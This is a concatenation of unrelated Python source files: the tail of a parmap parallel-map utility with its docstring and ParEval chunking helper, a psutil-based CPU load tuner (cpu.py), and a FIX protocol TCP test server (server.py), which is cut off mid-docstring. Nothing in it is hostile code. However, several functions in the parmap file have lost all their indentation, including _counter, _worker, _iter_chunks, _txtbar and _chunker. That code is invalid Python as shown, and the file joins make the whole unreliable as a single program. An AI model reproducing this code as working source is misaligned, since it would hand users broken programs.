        How to be break up the incoming sequence. Useful if also using threads.
        Will be (re)set to max(chunksize,Nt).
        Alternatively, if len(seq) exists and chunksize=-1 it will be reset
        to ceil(len(seq)/(N*Nt)). If chunksize=-1 and len(sequence) is not
        known, a warning will be emitted and chunksize will be reset to
        max(chunksize,Nt)

    ordered [True] (bool)
        Whether or not to order the results. If False, will return in whatever
        order they finished.

    daemon [True] (bool)
        Sets the multiprocessing `daemon` flag. If True, can not spawn child
        processes (i.e. cannot nest parmap) but should allow for CTRL+C type
        stopping. Supposedly, there may be issues with CTRL+C with it set to
        False. Use at your own risk

    progress [False] (bool)
        Display a progress bar or counter.
        Warning: Inconsistent in iPython/Jupyter notebooks and may clear
        other printed content. Instead, specify as 'nb' to use a Jupyter
        Widget progress bar.

    args [tuple()]
        Specify additional arguments for the function. They are added *after*
        the input argument

    kwargs [dict()]
        Specify additional keyword arguments

    star [False]
        If True, the arguments to the function will be "starred" so, for example
        if `seq = [ (1,2), (3,4) ]`, the function will be called as
            star is False: fun((1,2))
            star is True:  fun(1,2) <==> fun(*(1,2))
        Can also set to None to not send anything

    kwstar [False]
        Assumes all items are (vals,kwvals) where `vals` RESPECTS `star`
        setting and still includes `args` and `kwvals`. See "Additional
        Arguments" section below.

    exception ['raise' if N>1 else 'proc']
        Choose how to handle an exception in a child process
        'raise'  : [Default] raise the exception (outside of the Process).
                   Also terminates all existing processes.
        'return' : Return the Exception instead of raising it.
        'proc'   : Raise the exception inside the process. NOT RECOMMENDED
                   unless used in debugging (and with N=1)
        Note: An additional attribute called `seq_index` will also be set
        in the exception (whether raised or returned) to aid in debugging.

    Additional Arguments
    --------------------
    As noted above, there are many ways to pass additional arguments to
    your function. All of these are not completely needed since parmap
    makes using lambdas so easy, but they are there if preferred.

    Assume the following function:

        def dj(dictA,dictB):
            '''Join dictA and dictB where dictB takes precedence'''
            dictA = dictA.copy()
            dictA.update(dictB) # NOTE: dictB takes precedence
            return dictA

    Then the behavior is as follows where `args` and `kwargs` come from
    the main function call. The `val` (singular), `vals` (sequence/tuple of
    values), and `kwvals` are set via the sequence.

    | star  | kwstar | expected   | args           | kw args             |   |
    |-------|--------|------------|----------------|---------------------|---|
    | False | False  | val        | *((val,)+args) | **kwargs            | A |
    | True  | False  | vals       | *(vals+args)   | **kwargs            |   |
    | None  | False  | ---        | *args          | **kwargs            | B |
    | None  | True   | ---        | *args          | **dj(kwargs,kwvals) | C |
    | False | True   | val,kwval  | *((val,)+args) | **dj(kwargs,kwvals) | C |
    | True  | True   | vals,kwval | *(vals+args)   | **dj(kwargs,kwvals) | C |

    A: Default
    B: If kwargs and args are empty, basically calls with nothing
    C: Note the ordering so kwvals takes precedence

    Note:
    -----
    Performs SEMI-lazy iteration based on chunksize. It will exhaust the input
    iterator but will yield as results are computed (This is similar to the
    `multiprocessing.Pool().imap` behavior)

    Explicitly wrap the parmap call in a list(...) to force immediate
    evaluation

    Threads and/or Processes:
    -------------------------
    This tool has the ability to split work amongst python processes
    (via multiprocessing) and python threads (via the multiprocessing.dummy
    module). Python is not very performant in multi-threaded situations
    (due to the GIL) therefore, processes are the usually the best for CPU
    bound tasks and threading is good for those that release the GIL (such
    as IO-bound tasks).

    WARNING: Many NumPy functions *do* release the GIL and can be threaded,
    but many NumPy functions are, themselves, multi-threaded.

    Alternatives:
    -------------
    This tool allows more data types, can split with threads, has an optional
    progress bar, and has fewer pickling issues, but these come at a small cost.
    For simple needs, the following may be better:

    >>> import multiprocessing as mp
    >>> with mp.Pool(N) as pool:
    >>>     results = list( pool.imap(fun,seq) ) # or just pool.map

    Start Methods:
    --------------
    * This tool is NOT compatible with Windows, just macOS (see below)
      and Linux
    * on macOS, starting with python3.8, the start method must be explicitly
      set when python starts up. See the [1] for details.

        >>> import multiprocessing as mp
        >>> mp.set_start_method('fork')

      If this has already been set, it will throw a RuntimeError.
      Alternatively, call the parmap(per).set_start_method()

      Or, set the PYTOOLBOX_SET_START=true as an environment variable and
      this will be set on module load. For example,

        export PYTOOLBOX_SET_START=true

      Also, set the following to prevent issues [2][3]

        export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES

      to your .bashrc

    [1]: https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods
    [2]: https://www.wefearchange.org/2018/11/forkmacos.rst.html
    [3]: https://stackoverflow.com/q/50168647/3633154

    Additional Note
    ---------------
    For the sake of convenience, a `map = imap = __call__` and
    `close = lambda *a,**k:None` are also added so a parmap function can
    mimic a multiprocessing pool object with duck typing

    Version:
    -------
    __version__
    """
    # Additional Notes:
    # This currently assumes the starting behavior of multiprocessing for
    # python 3.8. When 3.9 is released, it may have to be updated again.
    if sys.platform.lower().startswith('win'):
        raise RuntimeError('Not compatible with Windows')
    if sys.platform.startswith('darwin') and \
       sys.version_info >= (3,8) and \
       mp.get_start_method(allow_none=True) != 'fork':
        raise RuntimeError("Must set multiprocessing start_method to 'fork'. "
                           "Use `set_start_method` or see documentation")
    # Build up a dummy function with args,vals,kwargs, and kwvals
    if kwargs is None:
        kwargs = {}
    def _fun(ss):
        # Wraps `fun`: applies the star/kwstar calling convention (numbered
        # cases mirror the docstring table) and converts any exception into
        # an _Exception marker instead of letting it escape the worker.
        _args = list(args)
        _kw = kwargs.copy()
        try:
            # Check for None before boolean
            if star is None and kwstar: # 4
                _kw.update(ss)
            elif star is None and not kwstar: # 3
                pass
            elif not star and not kwstar: # 1
                _args = [ss] + _args
            elif star and not kwstar: # 2
                _args = list(ss) + _args
            elif not star and kwstar: # 5
                _args = [ss[0]] + _args
                _kw.update(ss[1])
            elif star and kwstar: # 6
                _args = list(ss[0]) + _args
                _kw.update(ss[1])
            else:
                raise TypeError()
        except TypeError: # Mostly because bad input types
            return _Exception(TypeError('Ensure `args` are tuples and `kwargs` are dicts'),infun=False)
        except Exception as E:
            return _Exception(E,infun=False)
        if exception == 'proc':
            return fun(*_args,**_kw) # Outside of a try
        try:
            return fun(*_args,**_kw)
        except Exception as E:
            return _Exception(E)
        # It would be great to include all of sys.exc_info() but tracebacks
        # cannot be pickled.
    try:
        tot = len(seq)
    except TypeError:
        # `seq` is a length-less iterator; some sizing options degrade.
        tot = None
    N = CPU_COUNT if N is None else N
    if exception is None:
        exception = 'raise' if N>1 else 'proc'
    if chunksize == -1:
        if tot is None:
            warnings.warn('chunksize=-1 does not work when len(seq) is not known')
        else:
            chunksize = math.ceil(tot/(N*Nt))
    chunksize = max(chunksize,Nt) # Reset
    # Consider resetting N
    # NOTE(review): when 0 < len(seq) < chunksize this floors N to 0 and the
    # multiprocessing path below starts zero workers and yields nothing --
    # confirm whether small sequences should instead clamp N to 1.
    if tot is not None:
        N = min(N,tot//chunksize)
    # Build a counter iterator based on settings and tqdm
    if tqdm is None:
        if isinstance(progress,(str,unicode))\
        and progress.lower() in ['jupyter','notebook','nb']:
            counter = partial(_counter_nb,tot=tot)
        else:
            counter = partial(_counter,tot=tot)
    else:
        if isinstance(progress,(str,unicode))\
        and progress.lower() in ['jupyter','notebook','nb']\
        and hasattr(tqdm,'tqdm_notebook'):
            counter = partial(tqdm.tqdm_notebook,total=tot)
        else:
            counter = partial(tqdm.tqdm,total=tot) # Set the total since tqdm won't be able to get it.
    # Handle N=1 without any multiprocessing
    if N == 1:
        try:
            if Nt == 1:
                out = imap(_fun,seq)
            else:
                pool = mpd.Pool(Nt) # thread pools don't have the pickle issues
                out = pool.imap(_fun,seq)
            if progress:
                out = counter(out)
            for count,item in enumerate(out):
                if isinstance(item,_Exception):
                    item.E.seq_index = count # Store the index where this happened
                    if not item.infun:
                        exception = 'raise' # reset
                    if exception == 'raise':
                        raise item.E
                    elif exception == 'return':
                        item = item.E
                    elif exception == 'proc':
                        pass
                    else:
                        raise ValueError("Unrecognized `exception` setting '{}'".format(exception))
                yield item
        finally:
            if Nt > 1:
                pool.close()
        return
    q_in = mp.JoinableQueue() # Will need to `join` later to make sure is empty
    q_out = mp.Queue()
    workers = [mp.Process(target=_worker, args=(_fun, q_in, q_out,Nt)) for _ in range(N)]
    # Create a separate thread to add to the queue in the background
    def add_to_queue():
        # Feed enumerated chunks to the workers; enumeration indices are
        # used later for ordering and for `seq_index` on exceptions.
        for iixs in _iter_chunks(enumerate(seq),chunksize):
            q_in.put(iixs)
        # Once (if ever) it is exhausted, send None to close workers
        for _ in xrange(N):
            q_in.put(None)
    # Define a generator that will pull from the q_out and then run through
    # the rest of our generator/iterator chain for progress and ordering
    def queue_getter():
        # Each worker puts a final None when it shuts down; stop after all
        # N have been seen.
        finished = 0
        count = 0
        while finished < N:
            out = q_out.get()
            if out is None:
                finished += 1
                continue
            for o in out: # yield from out
                yield o
    try:
        # Start the workers
        for worker in workers:
            worker.daemon = daemon
            worker.start()
        add_to_queue_thread = Thread(target=add_to_queue)
        add_to_queue_thread.start()
        # Chain generators on output
        out = queue_getter()
        if progress:
            out = counter(out)
        if ordered:
            out = _sort_generator_unique_integers(out,key=lambda a:a[0])
        # Return items
        for item in out:
            count = item[0]
            item = item[1]
            if isinstance(item,_Exception):
                item.E.seq_index = count
                if not item.infun:
                    exception = 'raise' # reset
                if exception == 'raise':
                    for worker in workers:
                        worker.terminate()
                    raise item.E
                elif exception == 'return':
                    item = item.E
                elif exception == 'proc':
                    pass
                else:
                    for worker in workers:
                        worker.terminate()
                    raise ValueError("Unrecognized `exception` setting '{}'".format(exception))
            yield item
    finally:
        # Clean up threads and processes. Make sure the queue is exhausted
        # NOTE(review): if we exited via `raise item.E` above, terminated
        # workers may leave items on q_in without a matching task_done(),
        # so q_in.join() could block -- confirm intended shutdown semantics.
        add_to_queue_thread.join() # Make sure we've exhausted the input
        q_in.join() # Make sure there is nothing left in the queue
        for worker in workers:
            worker.join() # shut it down
# Add dummy methods
parmap.map = parmap.imap = parmap.__call__
parmap.close = lambda *a,**k: None
parmap.__doc__ = parmap.__doc__.replace('__version__',__version__)
parmapper = parmap # Rename
Xmap = parmap
def _counter(items,tot=None):
for ii,item in enumerate(items):
if tot is not None:
_txtbar(ii,tot,ticks=50,text='')
else:
txt = '{}'.format(ii+1)
print('\r%s' % txt,end='')
sys.stdout.flush()
yield item
def _counter_nb(items, tot=None):
    """Pass `items` through unchanged while updating Jupyter widgets.

    Shows an IntText running count and, when `tot` is known, an
    IntProgress bar as well. Requires ipywidgets/IPython (imported lazily
    so they stay optional).

    :param items: iterable to pass through.
    :param tot: total number of items, or None when unknown.
    """
    from ipywidgets import IntProgress, IntText
    from IPython.display import display
    if tot is not None:
        g = IntText(value=0, description='total = %d' % tot)
        f = IntProgress(min=0, max=tot)
        display(f)
        # Fix: removed dead store `g.desription = 'hi'` -- a misspelled
        # attribute name, so it never affected the widget.
    else:
        g = IntText(value=0)
        f = None
    display(g)
    for ii, item in enumerate(items):
        if f:
            f.value += 1
        g.value += 1
        yield item
def _worker(fun,q_in,q_out,Nt):
""" This actually runs everything including threadpools"""
if Nt > 1:
pool = mpd.Pool(Nt)
_map = pool.map # thread pools don't have the pickle issues
else:
_map = map
while True:
iixs = q_in.get()
if iixs is None:
q_out.put(None)
q_in.task_done()
break
def _ap(ix):
i,x = ix
return i, fun(x)
res = tuple(_map(_ap,iixs)) # list forces the iteration
q_out.put(res)
q_in.task_done()
if Nt >1:
pool.close()
def _iter_chunks(seq,n):
"""
yield a len(n) tuple from seq. If not divisible, the last one would be less
than n
"""
_n = 0;
for item in seq:
if _n == 0:
group = [item]
else:
group.append(item)
_n += 1
if _n == n:
yield tuple(group)
_n = 0
if _n > 0:
yield tuple(group)
def _sort_generator_unique_integers(items,start=0,key=None):
"""
Yield from `items` in order assuming UNIQUE keys w/o any missing!
The items ( or key(item) ) MUST be an integer, without repeats, starting
at `start`
"""
queue = dict()
for item in items:
if key is not None:
ik = key(item)
else:
ik = item
if ik == start:
yield item
start += 1
# Get any stored items
while start in queue:
yield queue.pop(start) # average O(1), worse-case O(N)
start += 1 # but based on ref below, should be O(1)
else: # for integer keys.
queue[ik] = item # Ref: https://wiki.python.org/moin/TimeComplexity
# Exhaust the rest
while start in queue:
yield queue.pop(start)
start += 1
def _txtbar(count,N,ticks=50,text='Progress'):
"""
Print a text-based progress bar.
Usage:
_txtbar(count,N)
Inputs:
count : Iteration count (start at 0)
N : Iteration size
ticks : [50] Number of ticks
text : ['Progress'] Text to display (don't include `:`)
Prints a text-based progress bar to the terminal. Obviosly
printing other things to screen will mess this up:
"""
count = int(count+1)
ticks = min(ticks,N)
isCount = int(1.0*count%round(1.0*N/ticks)) == 0
if not (isCount or count == 1 or count == N):
return
Npound = int(round(1.0 * count/N*ticks));
Nspace = int(1.0*ticks - Npound);
Nprint = int(round(1.0 * count/N*100));
if count == 1:
Nprint = 0
if len(text)>0:
text +=': '
txt = '{:s}{:s}{:s} : {:3d}% '.format(text,'#'*Npound,'-'*Nspace,Nprint)
print('\r%s' % txt,end='')
sys.stdout.flush()
technical_details = """\
This code uses iterators/generators to handle and distribute the workload.
By doing this, it is easy to have all results pass through a common
counting function for display of the progress without the use of
global (multiprocessing manager) variables and locks.
With the exception of when N == 1 (where it falls back to serial methods)
the code works as follows:
- A background thread is started that will iterate over the incoming sequence
and add items to the queue. If the incoming sequence is exhausted, the
worker sends kill signals into the queue. The items are also chunked and
enumerated (used later to sort).
- After the background thread is started a function to pull from the OUTPUT
queue is created. This counts the number of closed processes but otherwise
yields the computed result items
- A pool of workers is created. Each worker will read from the input queue
and distribute the work amongst threads (if using). It will then
return the resuts into a queue
- Now the main work happens. It is done as chain of generators/iterators.
The background worker has already begin adding items to the queue so
now we work through the output queue. Note that this is in serial
since the work was already done in parallel
- Generator to pull from the result queue
- Generator to count and display progress (if progress=True).
- Generator to hold on to and return items in a sorted manner
if sorting is requested. This can cause itermediate results to be
stored until they can be returned in order
- The output generator chain is iterated pulling items through and then
are yielded.
- cleanup and close processes (if/when the input is exhausted)
"""
# Lazy NumPy module handle: stays None until ParEval/_chunker first runs.
np = None # will be imported when a ParEval is instantiated
class ParEval(object):
    """Callable that evaluates a *vectorized* fun(X) in parallel chunks.

    The input array is split along its first axis with `_chunker`, each
    piece is pushed through `parmap`, and the partial results are
    concatenated back together. If fun(X) is not vectorized, use the
    regular parmap instead. Requires numpy.

    Usage:
    ------
    Given a function `fun(X)` where X is a NumPy array (such as an
    (N, ndim) sample), `ParEval(fun)` is its parallel version and
    `ParEval(fun)(X)` evaluates it directly. Returning a callable object
    (instead of a function) means no functools.partial is needed when
    passing the parallelized function onward.

    Inputs:
    -------
    fun
        Function to call. Use parmap keywords (e.g. args, kwargs, star)
        to add to and/or control the function call.

    Specify at most one of:
    n_chunks
        How many chunks to split the input into.
    n_eval
        Upper limit on evaluations (rows) per chunk; converted into a
        chunk count. When neither is given, n_chunks = CPU_COUNT.

    Options:
    --------
    n_min [0]
        Minimum size of a chunk. Also overrides n_eval if needed (since
        n_eval is converted to n_chunks).

    All additional keyword options are forwarded to parmap. Splitting is
    along the first axis.
    """

    def __init__(self, fun, n_chunks=None, n_eval=None, n_min=0, **kwargs):
        global np
        if np is None:
            import numpy as np  # deferred so numpy stays an optional dep
        self.fun = fun
        if (n_chunks is not None) and (n_eval is not None):
            raise ValueError('Must specify EITHER n_chunks OR n_eval')
        if n_chunks is None and n_eval is None:
            n_chunks = CPU_COUNT
        self.n_chunks = n_chunks
        self.n_eval = n_eval
        self.n_min = n_min
        kwargs['chunksize'] = 1  # the data is already chunked by _chunker
        self.kwargs = kwargs

    def __call__(self, X):
        """Split X along axis 0, evaluate the pieces in parallel, and
        concatenate the results."""
        pieces = _chunker(X, n_chunks=self.n_chunks,
                          n_eval=self.n_eval,
                          n_min=self.n_min)
        partials = list(parmap(self.fun, pieces, **self.kwargs))
        return np.concatenate(partials)
class _chunker(object):
"""Object to actually break into chunks and has a __len__"""
def __init__(self,X,n_chunks=None,n_eval=None,n_min=0):
global np
if np is None:
import numpy as np
self.X = X = np.atleast_1d(X)
n = len(X)
# Get number of chunks
if n_eval is not None:
n_eval = max(n_min,n_eval)
n_chunks = int(np.ceil(n/n_eval))
if n_chunks is not None:
n_chunks = n_chunks
if n // n_chunks < n_min:
n_chunks = n // n_min
stops = np.asarray([n // n_chunks]*n_chunks,dtype=int)
stops[:n % n_chunks] += 1
self.stops = stops = np.cumsum(stops).tolist()
self.len = len(stops)
self.ii = 0
def __next__(self):
ii = self.ii
if ii == self.len:
raise StopIteration()
a = 0 if ii == 0 else self.stops[ii-1]
b = self.stops[ii]
self.ii += 1
return self.X[a:b]
next = __next__
def __iter__(self):
return self
def __len__(self):
return self.len
def set_start_method():
    """Force multiprocessing's 'fork' start method (required on macOS with
    Python 3.8+ for parmap to work).

    No-op on Python < 3.8 or when 'fork' is already active. Raises
    RuntimeError when the start method has already been fixed to something
    else and cannot be changed.
    """
    if sys.version_info < (3, 8):
        return
    if mp.get_start_method(allow_none=True) == 'fork':
        return  # already what we need
    try:
        mp.set_start_method('fork')
    except RuntimeError:
        raise RuntimeError('Cannot change startmethod. Restart Python and try again')
# Import-time hook: on macOS with Python 3.8+, opt into the 'fork' start
# method automatically when the PYTOOLBOX_SET_START environment variable is
# set to 'true' (see the "Start Methods" section of parmap's docstring).
if os.environ.get('PYTOOLBOX_SET_START','false').lower() == 'true' \
   and sys.version_info >= (3,8) \
   and sys.platform.startswith('darwin'):
    set_start_method()
    import logging
    logging.debug("Set start method on darwin to 'fork'")
################################################################################
################################################################################
## Below is a simpler version of parmap. It really only serves the purpose of
## being used to copy/paste when a short-and-sweet parmap is needed in a
## function or method and you do not want to require parmap(per).py
##
## It is basically *just* for reference
################################################################################
################################################################################
# def simple_parmap(fun,seq,N=None,daemon=True):
# """
# Simple, bare-bones parallel map function similar to parmap
# (or parmapper [1]) except much, much simpler. It lacks all
# bells and whistles but *does* perform parallel mapping
#
# Note: This always returns a list and not an iterator!
# And will not return until all computation is complete
#
# Use parmap if it is available.
#
# Inspired by [2]
#
# [1]:https://github.com/Jwink3101/parmapper
# [2]:https://stackoverflow.com/a/16071616/3633154
# """
# import multiprocessing as mp
# import sys
# if sys.platform.startswith('darwin') and \
# sys.version_info >= (3,8) and \
# mp.get_start_method(allow_none=True) != 'fork':
# raise RuntimeError("Must set multiprocessing start_method to 'fork'")
# if N is None:
# N = mp.cpu_count()
# def _fun(fun, q_in, q_out):
# while True:
# i, x = q_in.get()
# if i is None:
# q_in.task_done()
# break
# q_out.put((i, fun(x)))
# q_in.task_done()
#
# q_in,q_out = mp.JoinableQueue(),mp.Queue()
#
# proc = [mp.Process(target=_fun, args=(fun, q_in, q_out)) for _ in range(N)]
# for p in proc:
# p.daemon=daemon
# p.start()
#
# count = 0
# for ii,x in enumerate(seq):
# q_in.put((ii,x))
# count += 1
#
# for _ in range(N): q_in.put((None,None))
# res = [q_out.get() for _ in range(count)]
#
# q_in.join()
# for p in proc: p.join()
#
# return [x for i, x in sorted(res)]
|
cpu.py | import psutil # type: ignore
import multiprocessing
import threading
import time
from grape import FitnessHelper
class Cpu:
    """
    Description:
    ------------
    CPU load adaptation tool.

    Starts a daemon thread that periodically samples system-wide CPU usage
    (via psutil) and tunes ``FitnessHelper.sleep`` and
    ``FitnessHelper.pool_size`` so that the overall CPU load tracks the
    requested target percentage.
    """
    __percent: float        # target CPU percentage, clamped to [5.0, 90.0]
    __rate: float           # exponential-smoothing weight for new samples
    __interval: float       # seconds between samples (at least 1.0)
    __prev_percent: float   # previous smoothed CPU percentage
    __prev_sleep: float     # previous FitnessHelper.sleep value

    def __init__(self, percent: float, rate: float = 0.7, interval: float = 5) -> None:
        """Clamp the configuration and start the background tuning thread.

        :param percent: target CPU percentage (clamped to [5.0, 90.0]).
        :param rate: smoothing weight given to the newest sample.
        :param interval: seconds between samples (minimum 1.0).
        """
        self.__percent = min(90.0, max(5.0, percent))
        self.__rate = rate
        self.__interval = max(1.0, interval)
        # Seeded with the *unclamped* request; converges after a few samples.
        self.__prev_percent = percent
        self.__prev_sleep = 0.1
        self.__start()

    def __start(self) -> None:
        # Daemon thread: dies automatically with the interpreter.
        t = threading.Thread(target=self.__run, daemon=True)
        t.start()

    def __run(self) -> None:
        # Endless sampling loop executed on the daemon thread.
        while True:
            percent: float = psutil.cpu_percent(interval=None) # type: ignore
            # Exponentially smooth the new sample against the previous one.
            percent = percent * self.__rate + self.__prev_percent * (1 - self.__rate)
            # Scale the shared sleep toward the target load, clamped to
            # [0.001, 2.0] and smoothed against the previous sleep.
            FitnessHelper.sleep = max(0.001, min(2.0, FitnessHelper.sleep * percent / self.__percent * self.__rate + self.__prev_sleep * (1 - self.__rate)))
            if FitnessHelper.sleep > 1:
                # Sleeping a lot: shed a worker instead, and halve the sleep
                # only if the shrink actually took effect.
                prev = FitnessHelper.pool_size
                FitnessHelper.pool_size = max(1, FitnessHelper.pool_size - 1)
                if FitnessHelper.pool_size < prev:
                    FitnessHelper.sleep /= 2
            elif FitnessHelper.sleep < 0.1:
                # Barely sleeping: there is headroom, grow the pool (capped
                # at the CPU count) and double the sleep if it grew.
                prev = FitnessHelper.pool_size
                FitnessHelper.pool_size = min(multiprocessing.cpu_count(), FitnessHelper.pool_size + 1)
                if FitnessHelper.pool_size > prev:
                    FitnessHelper.sleep *= 2
            self.__prev_percent = percent
            self.__prev_sleep = FitnessHelper.sleep
            time.sleep(self.__interval)
|
server.py | """Fix TCP server module."""
import errno
import socket
import select
import threading
from six.moves import queue
from testplan.common.utils.timing import (
TimeoutException,
TimeoutExceptionInfo,
wait,
)
from testplan.common.utils.sockets.fix.utils import utc_timestamp
class ConnectionDetails(object):
    """Bundle of per-connection state tracked by the FIX server.

    Holds the accepted socket plus the (sender, target) name, the queue of
    received messages, and both FIX sequence counters. Only the connection
    is required at construction time; the remaining details are filled in
    later (e.g. once the logon is processed).
    """

    def __init__(
        self, connection, name=None, queue=None, in_seqno=1, out_seqno=1
    ):
        """
        :param connection: the accepted connection socket.
        :type connection: ``socket._socketobject``
        :param name: connection name (tuple of sender and target).
        :type name: ``tuple`` of ``str`` and ``str``
        :param queue: queue of received messages.
        :type queue: ``queue``
        :param in_seqno: inbound message sequence number.
        :type in_seqno: ``int``
        :param out_seqno: outbound message sequence number.
        :type out_seqno: ``int``
        """
        self.connection = connection
        self.name = name
        self.queue = queue
        self.in_seqno = in_seqno
        self.out_seqno = out_seqno
def _has_logon_tag(msg):
"""
Check if it is a logon message.
:param msg: Fix message
:type msg: ``FixMessage``
:return: ``True`` if it is a logon message
:rtype: ``bool``
"""
return msg.tag_exact(35, "A")
def _is_session_control_msg(msg):
    """Return whether `msg` is session-level rather than business-level.

    A message qualifies when it is a logout or a heartbeat.

    :param msg: Fix message.
    :type msg: ``FixMessage``
    :return: ``True`` if it is a message with non-business code
    :rtype: ``bool``
    """
    # `or` preserved so the heartbeat check is skipped for logout messages.
    is_logout = _has_logout_tag(msg)
    return is_logout or _has_heartbeat_tag(msg)
def _has_logout_tag(msg):
"""
Check if logout message.
:param msg: Fix message.
:type msg: ``FixMessage``
:return: True if it is a logout message
:rtype: ``bool``
"""
return msg.tag_exact(35, "5")
def _has_heartbeat_tag(msg):
"""
Check if heartbeat message.
:param msg: Fix message.
:type msg: ``FixMessage``
:return: True if it is a heartbeat message
:rtype: ``bool``
"""
return msg.tag_exact(35, "0")
class Server(object):
"""
A server that can send and receive FIX messages over the session protocol.
Supports multiple connections.
The server stamps every outgoing message with the senderCompID and
targetCompID for the corresponding connection.
"""
    def __init__(
        self,
        msgclass,
        codec,
        host="localhost",
        port=0,
        version="FIX.4.2",
        logger=None,
    ):
        """
        Create a new FIX server.

        This constructor takes parameters that specify the address (host,
        port) to connect to. The server stamps every outgoing message with
        the senderCompID and targetCompID for the corresponding connection.

        :param msgclass: Type used to send and receive FIX messages.
        :type msgclass: ``type``
        :param codec: A Codec to use to encode and decode FIX messages.
        :type codec: a ``Codec`` instance
        :param host: hostname or IP address to bind to.
        :type host: ``str``
        :param port: port number (0 lets the OS pick an ephemeral port).
        :type port: ``str`` or ``int``
        :param version: FIX version, defaults to "FIX.4.2". This string is
            used as the contents of tag 8 (BeginString).
        :type version: ``str``
        :param logger: Logger instance to be used.
        :type logger: ``logging.Logger``
        """
        self._input_host = host
        self._input_port = port
        # Actual bound address; filled in by start() after bind().
        self._ip = None
        self._port = None
        self.version = version
        self.msgclass = msgclass
        self.codec = codec
        # No-op logging fallback when no logger is supplied.
        self.log_callback = logger.debug if logger else lambda msg: None
        # Set True by the listener thread once it is polling for events.
        self._listening = False
        # Connection bookkeeping, indexed by file descriptor and by
        # (sender, target) name respectively.
        self._conndetails_by_fd = {}
        self._conndetails_by_name = {}
        self._first_sender = None
        self._first_target = None
        self._socket = None
        self._recv_thread = None
        self._lock = threading.Lock()
        self._pobj = select.poll()
    @property
    def host(self):
        """Input host provided at construction (not the resolved IP)."""
        return self._input_host
    @property
    def ip(self):
        """IP retrieved from the socket; None until start() has bound it."""
        return self._ip
    @property
    def port(self):
        """Port retrieved after binding; None until start() has bound it."""
        return self._port
    def start(self, timeout=30):
        """
        Start the FIX server.

        Binds the socket, records the actual address, spawns the background
        listener thread, and blocks until the thread reports it is
        listening (or the timeout expires).

        :param timeout: seconds to wait for the listener to come up.
        :type timeout: ``int``
        """
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Allow quick restarts on the same port.
        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._socket.bind((self._input_host, self._input_port))
        # Resolve the real address (port may have been 0 = ephemeral).
        self._ip, self._port = self._socket.getsockname()
        self.log_callback(
            "Started server on {}:{}".format(self.host, self.port)
        )
        self._recv_thread = threading.Thread(target=self._listen)
        self._recv_thread.daemon = True
        self._recv_thread.start()
        timeout_info = TimeoutExceptionInfo()
        wait(lambda: self._listening, timeout=timeout, interval=0.1)
        if not self._listening:
            raise TimeoutException(
                "Could not start server: timed out on listening. {}".format(
                    timeout_info.msg()
                )
            )
        self.log_callback("Listening for socket events.")
def _listen(self):
    """
    Listen for new inbound connections and messages from existing
    connections.

    Runs in the dedicated receiver thread until :meth:`stop` clears
    ``self._listening`` or the listening socket reports close/error.
    """
    self._socket.listen(1)
    self._listening = True
    self._pobj.register(
        self._socket.fileno(),
        select.POLLIN | select.POLLNVAL | select.POLLHUP,
    )
    closed = False
    while (not closed) and self._listening:
        # NOTE(review): poll() takes its timeout in *milliseconds*, so
        # 1.0 is a 1 ms wait - confirm this near-busy loop is intended.
        events = self._pobj.poll(1.0)
        for fdesc, event in events:
            if fdesc == self._socket.fileno():
                # Socket event received
                if event in [select.POLLNVAL, select.POLLHUP]:
                    self.log_callback('"Close socket" event received.')
                    closed = True
                    break  # out of 'for'
                elif event == select.POLLIN:
                    self.log_callback('"New connection" event received.')
                    self._add_connection()
                else:
                    raise Exception(
                        "Unexpected event {0} on fdesc {1}.".format(
                            event, fdesc
                        )
                    )
            else:
                # Connection event received
                self._process_connection_event(fdesc, event)
    # Loop ended: tear down every client connection, then the listener.
    self._remove_all_connections()
    self._socket.shutdown(socket.SHUT_RDWR)
    self._socket.close()
def _add_connection(self):
    """
    Accept new inbound connection from socket.

    The connection is tracked by file descriptor only until the client
    logs on, at which point it also gets a (sender, target) name entry.
    """
    connection, _ = self._socket.accept()
    conn_details = ConnectionDetails(connection)
    self._conndetails_by_fd[connection.fileno()] = conn_details
    self._pobj.register(
        connection.fileno(),
        select.POLLIN | select.POLLNVAL | select.POLLHUP,
    )
def _remove_connection(self, fdesc):
    """
    Unregister, close and remove inbound connection with given fd.

    :param fdesc: File descriptor of connection to be removed.
    :type fdesc: ``int``
    """
    self._pobj.unregister(fdesc)
    try:
        self._conndetails_by_fd[fdesc].connection.shutdown(
            socket.SHUT_RDWR
        )
    except socket.error as serr:
        if serr.errno != errno.ENOTCONN:
            raise
        # Else, client already closed the connection.
    self._conndetails_by_fd[fdesc].connection.close()
    name = self._conndetails_by_fd[fdesc].name
    del self._conndetails_by_fd[fdesc]
    # Connections that never logged on have no entry in the by-name map.
    if name in self._conndetails_by_name:
        del self._conndetails_by_name[name]
def _remove_all_connections(self):
    """
    Unregister, close and remove all existing inbound connections.

    Mirrors :meth:`_remove_connection` for each tracked connection:
    tolerates peers that already closed their end (ENOTCONN) and
    connections that never completed a logon (no by-name entry).
    """
    for fdesc, conndetails in self._conndetails_by_fd.items():
        self._pobj.unregister(fdesc)
        try:
            conndetails.connection.shutdown(socket.SHUT_RDWR)
        except socket.error as serr:
            # Peer already closed its end; anything else is a real error.
            if serr.errno != errno.ENOTCONN:
                raise
        conndetails.connection.close()
        # A connection that never logged on has name=None and no entry
        # in the by-name map; pop() avoids the KeyError the old
        # unconditional ``del`` raised in that case.
        self._conndetails_by_name.pop(conndetails.name, None)
    self._conndetails_by_fd = {}
def _process_connection_event(self, fdesc, event):
    """
    Process an event received from a connection.

    :param fdesc: File descriptor of the connection the message was
        received from.
    :type fdesc: ``int``
    :param event: Event received from connection.
    :type event: ``int``
    """
    conndetails = self._conndetails_by_fd[fdesc]
    connection = conndetails.connection
    if event == select.POLLIN:
        with self._lock:
            data = connection.recv(4096)
            if not data:
                # Empty read means the peer closed the connection.
                self.log_callback(
                    "Closing connection {} since no data available".format(
                        conndetails.name
                    )
                )
                self._remove_connection(fdesc)
            else:
                msg = self.msgclass.from_buffer(data, self.codec)
                self._process_message(fdesc, msg)
    elif event in [select.POLLNVAL, select.POLLHUP]:
        # BUGFIX: socket objects have no ``name`` attribute - log the
        # connection's logical name from its details instead.
        self.log_callback(
            "Closing connection {} event received".format(conndetails.name)
        )
        self._remove_connection(fdesc)
    else:
        raise Exception(
            "unexpected event {0} on fdesc {1}".format(event, fdesc)
        )
def _process_message(self, fdesc, msg):
    """
    Process given message received from connection with given fd.

    Routing: logout messages are echoed and the connection dropped;
